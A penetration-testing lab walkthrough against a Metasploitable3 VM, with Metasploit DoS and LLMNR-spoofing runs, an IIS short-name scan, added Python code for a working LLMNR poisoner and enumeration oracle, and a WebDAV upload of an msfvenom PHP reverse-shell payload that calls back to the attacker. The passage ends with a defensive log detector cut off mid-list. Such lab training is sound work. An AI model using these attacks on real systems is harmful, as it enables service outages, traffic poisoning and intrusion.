Penetration testing walkthrough: the Metasploitable3 target machine

Lab environment: one Kali VM with 4 GB of RAM, and one Metasploitable3 target at IP address 192.168.22.20 (the Kali attacker is 192.168.22.130, the LHOST used in the payloads below)
Lab goal: penetration-test the Metasploitable3 target
Lab steps:
(1) Scan the target
1. Scan the target with Nessus
2. Check that the target's services are up
3. Start the Metasploit framework and scan the target with nmap from inside msfconsole (db_nmap stores the results in the workspace database, so later modules can pick hosts and ports from it)

msf6 > db_nmap -A -T4 192.168.22.20

(2) Exploitation
1. LLMNR buffer underrun DoS (MS11-030)

msf6 > search  llmnr              find modules matching the information gathered

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/llmnr/ms11_030_dnsapi  2011-04-12       normal  No     Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
   1  auxiliary/scanner/llmnr/query                                 normal  No     LLMNR Query
   2  auxiliary/server/capture/smb                                  normal  No     Authentication Capture: SMB
   3  auxiliary/spoof/llmnr/llmnr_response                          normal  No     LLMNR Spoofer


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/spoof/llmnr/llmnr_response

msf6 > use auxiliary/dos/windows/llmnr/ms11_030_dnsapi     select the module
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set     show the current datastore (global and module settings)

Global
======

No entries in data store.

Module: dos/windows/llmnr/ms11_030_dnsapi
=========================================

  Name       Value
  ----       -----
  CHOST      
  CPORT      
  RHOSTS     224.0.0.252
  RPORT      5355
  VERBOSE    false
  WORKSPACE  

msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > show options   show the options that must be set

Module options (auxiliary/dos/windows/llmnr/ms11_030_dnsapi):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  224.0.0.252      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5355             yes       The target port (UDP)

msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set rhosts 192.168.22.20   set the target IP address (the default is the LLMNR multicast group)
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > run                   execute
[*] Running module against 192.168.22.20

[*] Sending Ipv6 LLMNR query to 192.168.22.20
[*] Sending Ipv4 LLMNR query to 192.168.22.20
[*] Note, in a default configuration, the service will restart automatically twice.
[*] In order to ensure it is completely dead, wait up to 5 minutes and run it again.
[*] Auxiliary module execution completed

2. LLMNR spoofing (the module also shows which names hosts on the segment are looking up)

msf6 > use auxiliary/spoof/llmnr/llmnr_response                select the module
msf6 auxiliary(spoof/llmnr/llmnr_response) > set                 show the current datastore

Global
======

No entries in data store.

Module: spoof/llmnr/llmnr_response
==================================

  Name                Value
  ----                -----
  GATEWAY_PROBE_HOST  8.8.8.8
  GATEWAY_PROBE_PORT  
  INTERFACE           
  REGEX               .*
  SECRET              1297303073
  SPOOFIP             
  TIMEOUT             500
  TTL                 30
  VERBOSE             false
  WORKSPACE           

msf6 auxiliary(spoof/llmnr/llmnr_response) > show options    show the options that must be set

Module options (auxiliary/spoof/llmnr/llmnr_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the LLMNR Name to determine if spoofed reply is sent
   SPOOFIP                     yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data
   TTL        30               no        Time To Live for the spoofed response


Auxiliary action:

   Name     Description
   ----     -----------
   Service  Run LLMNR spoofing service


msf6 auxiliary(spoof/llmnr/llmnr_response) > set spoofip 192.168.22.20    SPOOFIP is the address written into poisoned replies; this run points it at the target itself, whereas a real attack points it at the attacker's listener (for example the SMB capture server listed in the search results)
spoofip => 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > run                        execute (runs as a background job)
[*] Auxiliary module running as background job 0.
msf6 auxiliary(spoof/llmnr/llmnr_response) > 
[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX "(?-mix:.*)" ...
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > [+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
Press Ctrl+C first to get the prompt back (the spoofer keeps running as a background job)
msf6 auxiliary(spoof/llmnr/llmnr_response) > jobs    list background jobs

Jobs
====

  Id  Name                                   Payload  Payload opts
  --  ----                                   -------  ------------
  0   Auxiliary: spoof/llmnr/llmnr_response           

msf6 auxiliary(spoof/llmnr/llmnr_response) > kill 0     kill the background spoofing job (otherwise it keeps answering queries)
[*] Stopping the following job(s): 0
[*] Stopping job 0
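
What the spoofer does in packet terms, as an added example written for this page (it is not code from the Metasploit module or from the original post): build the LLMNR query a Windows host multicasts for a single-label name such as wpad, apply the same REGEX gate the module uses, and construct the poisoned A-record reply that SPOOFIP and TTL end up in. Transaction IDs, names and addresses are constructed; `serve` is the only function that touches the network and is not exercised by the offline round trip at the bottom.

```python
import re
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS message layout, over UDP 5355 to 224.0.0.252.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A = 1


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def decode_name(data: bytes, offset: int):
    """Inverse of encode_name; LLMNR does not use DNS name compression, so no pointers."""
    labels = []
    while True:
        n = data[offset]
        offset += 1
        if n == 0:
            break
        labels.append(data[offset:offset + n].decode("ascii"))
        offset += n
    return ".".join(labels), offset


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a host multicasts when single-label name resolution falls back to LLMNR."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags 0 (query), QDCOUNT 1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes):
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if flags & 0x8000 or qd != 1:
        return None  # a response, or not the single-question query we answer
    name, off = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": packet[12:off + 4]}


def build_response(query: dict, spoof_ip: str, ttl: int = 30) -> bytes:
    """Poisoned reply: same ID and question, QR=1, one A record pointing at spoof_ip."""
    header = struct.pack("!HHHHHH", query["id"], 0x8000, 1, 1, 0, 0)
    rdata = socket.inet_aton(spoof_ip)
    answer = encode_name(query["name"]) + struct.pack("!HHIH", QTYPE_A, 1, ttl, len(rdata)) + rdata
    return header + query["question"] + answer


def spoof_decision(packet: bytes, regex: str, spoof_ip: str, ttl: int = 30):
    """The module's REGEX gate: reply only to A queries whose name matches, else stay silent."""
    q = parse_query(packet)
    if q is None or q["qtype"] != QTYPE_A or not re.search(regex, q["name"]):
        return None
    return build_response(q, spoof_ip, ttl)


def parse_response(packet: bytes) -> dict:
    """Read back the single A record in a reply (what the victim's resolver would see)."""
    txid, flags, _qd, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    _qname, off = decode_name(packet, 12)
    off += 4  # skip QTYPE/QCLASS of the echoed question
    aname, off = decode_name(packet, off)
    _rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
    rdata = packet[off + 10:off + 10 + rdlen]
    return {"id": txid, "is_response": bool(flags & 0x8000), "name": aname,
            "ttl": ttl, "ip": socket.inet_ntoa(rdata)}


def serve(local_ip: str, spoof_ip: str, regex: str = ".*"):
    """Join the LLMNR group and answer matching queries by unicast to the asker.
    Blocks forever and poisons real hosts: lab networks only."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
                 socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(local_ip))
    while True:
        data, (src_ip, src_port) = s.recvfrom(4096)
        reply = spoof_decision(data, regex, spoof_ip)
        if reply:
            s.sendto(reply, (src_ip, src_port))
            print(f"{src_ip} llmnr - {parse_query(data)['name']} matches regex, responding with {spoof_ip}")


if __name__ == "__main__":
    # Offline round trip with a constructed 'wpad' query (no packets are sent).
    query = build_query(0x1234, "wpad")
    reply = spoof_decision(query, "^wpad$", "192.168.22.20")
    print(parse_response(reply))
```

Two points the transcript above does not make explicit: the reply goes unicast to the asker's source port, not back to the multicast group, and there is no authentication anywhere in the exchange, so whoever answers first wins. That is why the defensive fix is to disable LLMNR (and NBT-NS) by policy rather than to filter responders.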

3. ASP stack exhaustion denial of service (MS10-065)

msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > search  Microsoft IIS    find modules matching the information gathered

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/http/iis_auth_bypass                 2010-07-02       normal     No     MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
   1   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof         2010-12-21       normal     No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   2   auxiliary/dos/windows/ftp/iis_list_exhaustion        2009-09-03       normal     No     Microsoft IIS FTP Server LIST Stack Exhaustion
   3   auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal     No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   4   auxiliary/scanner/http/iis_internal_ip                                normal     No     Microsoft IIS HTTP Internal IP Disclosure
   5   auxiliary/scanner/http/iis_shortname_scanner                          normal     Yes    Microsoft IIS shortname vulnerability scanner
   6   auxiliary/scanner/http/owa_iis_internal_ip           2012-12-17       normal     No     Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
   7   exploit/windows/ftp/ms09_053_ftpd_nlst               2009-08-31       great      No     MS09-053 Microsoft IIS FTP Server NLST Response Overflow
   8   exploit/windows/http/umbraco_upload_aspx             2012-06-28       excellent  No     Umbraco CMS Remote Command Execution
   9   exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual     Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   10  exploit/windows/iis/iis_webdav_upload_asp            2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   11  exploit/windows/iis/ms01_023_printer                 2001-05-01       good       Yes    MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow
   12  exploit/windows/iis/ms01_026_dbldecode               2001-05-15       excellent  Yes    MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
   13  exploit/windows/iis/ms01_033_idq                     2001-06-18       good       No     MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
   14  exploit/windows/iis/ms02_018_htr                     2002-04-10       good       No     MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
   15  exploit/windows/iis/ms02_065_msadc                   2002-11-20       normal     Yes    MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
   16  exploit/windows/iis/ms03_007_ntdll_webdav            2003-05-30       great      Yes    MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   17  exploit/windows/iis/msadc                            1998-07-17       excellent  Yes    MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
   18  exploit/windows/isapi/ms00_094_pbserver              2000-12-04       good       Yes    MS00-094 Microsoft IIS Phone Book Service Overflow
   19  exploit/windows/isapi/ms03_022_nsiislog_post         2003-06-25       good       Yes    MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
   20  exploit/windows/isapi/ms03_051_fp30reg_chunked       2003-11-11       good       Yes    MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
   21  exploit/windows/isapi/rsa_webagent_redirect          2005-10-21       good       Yes    Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
   22  exploit/windows/isapi/w3who_query                    2004-12-06       good       Yes    Microsoft IIS ISAPI w3who.dll Query String Overflow
   23  exploit/windows/ssl/ms04_011_pct                     2004-04-13       average    No     MS04-011 Microsoft Private Communications Transport Overflow


Interact with a module by name or index. For example info 23, use 23 or use exploit/windows/ssl/ms04_011_pct
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos    select the module
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > show options     show the options that must be set

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   80               yes       The target port (TCP)
   URI     /page.asp        yes       URI to request
   VHOST                    no        The virtual host name to use in requests

msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rhosts 192.168.22.20     target IP address
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rport 8022             target port (the module defaults to 80)
rport => 8022
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > run                  execute
[*] Running module against 192.168.22.20

[*] 192.168.22.20:8022 - Attacking http://192.168.22.20:8022/page.asp

Browsing the target's web pages showed a noticeable delay and the target itself became sluggish, but the attack is not stable. That is consistent with the module's own description: it is written for IIS 6.0 ASP, so a reliable effect on other IIS versions is not guaranteed.

4. Microsoft IIS short-name (8.3) vulnerability scanner

msf6 auxiliary(scanner/http/iis_internal_ip) > use auxiliary/scanner/http/iis_shortname_scanner   select the module
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set          show the current datastore

Global
======

No entries in data store.

Module: scanner/http/iis_shortname_scanner
==========================================

  Name                          Value
  ----                          -----
  DOMAIN                        WORKSTATION
  DigestAuthIIS                 true
  FingerprintCheck              true
  HTTP::header_folding          false
  HTTP::method_random_case      false
  HTTP::method_random_invalid   false
  HTTP::method_random_valid     false
  HTTP::pad_fake_headers        false
  HTTP::pad_fake_headers_count  0
  HTTP::pad_get_params          false
  HTTP::pad_get_params_count    16
  HTTP::pad_method_uri_count    1
  HTTP::pad_method_uri_type     space
  HTTP::pad_post_params         false
  HTTP::pad_post_params_count   16
  HTTP::pad_uri_version_count   1
  HTTP::pad_uri_version_type    space
  HTTP::uri_dir_fake_relative   false
  HTTP::uri_dir_self_reference  false
  HTTP::uri_encode_mode         hex-normal
  HTTP::uri_fake_end            false
  HTTP::uri_fake_params_start   false
  HTTP::uri_full_url            false
  HTTP::uri_use_backslashes     false
  HTTP::version_random_invalid  false
  HTTP::version_random_valid    false
  HttpClientTimeout             
  HttpPassword                  
  HttpRawHeaders                
  HttpTrace                     false
  HttpTraceColors               red/blu
  HttpTraceHeadersOnly          false
  HttpUsername                  
  PATH                          /
  Proxies                       
  RHOSTS                        
  RPORT                         80
  SSL                           false
  SSLVersion                    Auto
  THREADS                       20
  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  VERBOSE                       false
  VHOST                         
  WORKSPACE                     

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 192.168.22.20     target IP address
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/iis_shortname_scanner) > show options      show the options that must be set

Module options (auxiliary/scanner/http/iis_shortname_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The base path to start scanning from
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.22.20    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  20               yes       Number of threads to use
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/iis_shortname_scanner) > run    execute
[*] Running module against 192.168.22.20

[*] Scanning in progress...
[+] Found 1 directories
[+] http://192.168.22.20/aspnet*~1
[+] Found 2 files
[+] http://192.168.22.20/index*~1.htm*
[+] http://192.168.22.20/six_of*~1.zip*
[*] Auxiliary module execution completed
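
How the scanner recovers those names, as an added example that is not the Metasploit module's code: it cannot list the directory, it only has a yes/no oracle, so it guesses the 8.3 short name one character at a time, first the up-to-6-character stem and then the up-to-3-character extension. The simulated oracle below reproduces the side channel with fnmatch over the three entries reconstructed from the scan output above (ASPNET~1, INDEX~1.HTM, SIX_OF~1.ZIP); the HTTP oracle performs the real probe (GET /<pattern>/.aspx, 404 when the wildcard matches versus 400 when it does not) and is not run offline.

```python
import fnmatch
import http.client

# 8.3 short names: up to 6 stem characters, "~1", up to 3 extension characters.
NAME_CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
EXT_CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
MAX_NAME, MAX_EXT = 6, 3


def make_simulated_oracle(short_names):
    """Constructed stand-in for the side channel: True when any 8.3 entry matches the glob."""
    entries = [n.upper() for n in short_names]
    return lambda pattern: any(fnmatch.fnmatchcase(e, pattern.upper()) for e in entries)


def make_http_oracle(host, port=80, base="/", timeout=5):
    """The real side channel on a vulnerable IIS: GET /<pattern>/.aspx answers 404 when the
    wildcard matches an existing short name and 400 when it does not (not run offline)."""
    def exists(pattern):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", f"{base}{pattern}/.aspx")
        status = conn.getresponse().status
        conn.close()
        return status == 404
    return exists


def enumerate_shortnames(exists):
    """Recover directory and file short names one character at a time through the oracle.
    Output uses the scanner's notation: 'name*~1' for directories, 'name*~1.ext*' for files,
    the trailing '*' meaning the real long name may continue past the 8.3 stem."""
    if not exists("*~1*"):                      # the scanner's vulnerability pre-check
        return {"vulnerable": False, "dirs": [], "files": []}
    dirs, files = set(), set()

    def walk_ext(name, ext=""):
        for ch in EXT_CHARSET:
            e = ext + ch
            if not exists(f"{name}~1.{e}*"):
                continue
            if exists(f"{name}~1.{e}"):         # extension complete
                files.add(f"{name.lower()}*~1.{e.lower()}*")
            if len(e) < MAX_EXT:
                walk_ext(name, e)

    def walk_name(prefix=""):
        for ch in NAME_CHARSET:
            n = prefix + ch
            if not exists(f"{n}*~1*"):          # nothing starts with this prefix
                continue
            if exists(f"{n}~1*"):               # some entry's stem is exactly n
                if exists(f"{n}~1"):            # no extension at all: reported as a directory
                    dirs.add(f"{n.lower()}*~1")
                walk_ext(n)
            if len(n) < MAX_NAME:               # longer stems may share this prefix
                walk_name(n)

    walk_name()
    return {"vulnerable": True, "dirs": sorted(dirs), "files": sorted(files)}


if __name__ == "__main__":
    # Constructed target: the three 8.3 entries the scan above recovered on Metasploitable3.
    oracle = make_simulated_oracle(["ASPNET~1", "INDEX~1.HTM", "SIX_OF~1.ZIP"])
    print(enumerate_shortnames(oracle))
    # Against a live host: enumerate_shortnames(make_http_oracle("192.168.22.20"))
```

The cost is a few dozen requests per recovered character, which is why the module runs 20 threads by default and why the probes are easy to spot in IIS logs (a burst of 400/404 responses to paths containing `*~1`). Only entries that actually have a tilde short name can be found; on a volume with 8.3 name generation disabled the pre-check fails and the scanner reports nothing.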

5. WebDAV upload vulnerability (davtest)

┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/          first test which file types can be uploaded, and which of them the server executes
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.22.20:8585/uploads
********************************************************
NOTE    Random string for this session: QlP180WUMS
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
********************************************************
 Sending test files
PUT     shtml   SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT     jhtml   SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT     asp     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT     html    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT     jsp     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT     cgi     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT     pl      SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT     txt     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT     php     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT     cfm     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT     aspx    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
********************************************************
 Checking for test file execution
EXEC    shtml   FAIL
EXEC    jhtml   FAIL
EXEC    asp     FAIL
EXEC    html    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
EXEC    jsp     FAIL
EXEC    cgi     FAIL
EXEC    pl      FAIL
EXEC    txt     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
EXEC    php     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
EXEC    cfm     FAIL
EXEC    aspx    FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php

┌──(root💀kali)-[~]
└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.22.130  LPORT=888  -f raw >demon.php    generate the payload (LHOST is the attacker's listening IP, LPORT the listening port; the payload name must match the one given to the handler below)

┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_QlP180WUMS/8888.php    upload the payload (DavTestDir_QlP180WUMS is the directory the first run created, reachable from the web root)
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.22.20:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/8888.php


msf6 > use exploit/multi/handler                     select the module
[*] Using configured payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp   the same payload msfvenom generated
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.22.130    attacker IP address (must match LHOST in the payload)
lhost => 192.168.22.130
msf6 exploit(multi/handler) > set lport 888  attacker listening port (must match LPORT in the payload)
lport => 888
msf6 exploit(multi/handler) > run        execute, then open the uploaded file in a browser

[*] Started reverse TCP handler on 192.168.22.130:888 


msf6 exploit(multi/handler) > run   after the uploaded file is opened in the browser, a session comes back

[*] Started reverse TCP handler on 192.168.22.130:888 
[*] Meterpreter session 2 opened (192.168.22.130:888 -> 192.168.22.20:55520) at 2021-02-08 17:42:08 +0800

meterpreter > ls               quick test: the shell works, and it lands in the upload directory
Listing: C:\wamp\www\uploads\DavTestDir_QlP180WUMS
==================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  34280  fil   2021-02-08 17:32:37 +0800  8888.php
100666/rw-rw-rw-  44     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.asp
100666/rw-rw-rw-  44     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.aspx
100666/rw-rw-rw-  42     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.cfm
100666/rw-rw-rw-  66     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.cgi
100666/rw-rw-rw-  26     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.html
100666/rw-rw-rw-  37     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.jhtml
100666/rw-rw-rw-  37     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.jsp
100666/rw-rw-rw-  24     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.php
100666/rw-rw-rw-  66     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.pl
100666/rw-rw-rw-  179    fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.shtml
100666/rw-rw-rw-  19     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.txt

meterpreter > 
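
The same sequence seen from the defender's side, as an added example (Python, written for this page; it is not from davtest or the original post): Apache records every MKCOL and PUT, and later the GET that executes the uploaded script, so the detection is a correlation over the access log rather than a signature on one request. The log lines are constructed to mirror the run above (attacker 192.168.22.130, the DavTestDir_QlP180WUMS directory, 8888.php) and the field layout assumes Apache's common log format.

```python
import re

# Apache common/combined log prefix: client, ident, user, [time], "METHOD PATH PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "PROPPATCH", "DELETE"}
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp", ".cgi", ".pl", ".shtml", ".cfm", ".jhtml")


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def analyse(lines):
    """Two signals. 'webdav_write': any WebDAV write method the server accepted (2xx).
    'webshell_executed': a PUT of a server-side script that was later requested with GET and
    served with 200, which is davtest's PUT-versus-EXEC distinction seen from the server."""
    alerts = []
    uploaded = {}  # path -> ip that PUT it
    for raw in lines:
        e = parse_line(raw)
        if e is None:
            continue
        accepted = 200 <= e["status"] < 300
        if e["method"] in WRITE_METHODS and accepted:
            alerts.append(("webdav_write", e["ip"], e["method"], e["path"]))
            if e["method"] == "PUT" and e["path"].lower().endswith(SCRIPT_EXT):
                uploaded[e["path"]] = e["ip"]
        elif e["method"] == "GET" and accepted and e["path"] in uploaded:
            alerts.append(("webshell_executed", e["ip"], uploaded[e["path"]], e["path"]))
    return alerts


# Constructed sample in Apache's format, mirroring the davtest run and the 8888.php upload above.
SAMPLE_LOG = [
    '192.168.22.130 - - [08/Feb/2021:15:29:23 +0800] "MKCOL /uploads/DavTestDir_QlP180WUMS HTTP/1.1" 201 -',
    '192.168.22.130 - - [08/Feb/2021:15:29:23 +0800] "PUT /uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt HTTP/1.1" 201 -',
    '192.168.22.130 - - [08/Feb/2021:15:29:24 +0800] "PUT /uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php HTTP/1.1" 201 -',
    '192.168.22.130 - - [08/Feb/2021:15:29:25 +0800] "GET /uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php HTTP/1.1" 200 24',
    '192.168.22.130 - - [08/Feb/2021:17:32:37 +0800] "PUT /uploads/DavTestDir_QlP180WUMS/8888.php HTTP/1.1" 201 -',
    '192.168.22.130 - - [08/Feb/2021:17:42:08 +0800] "GET /uploads/DavTestDir_QlP180WUMS/8888.php HTTP/1.1" 200 0',
    '192.168.22.1 - - [08/Feb/2021:17:45:00 +0800] "GET /index.php HTTP/1.1" 200 512',
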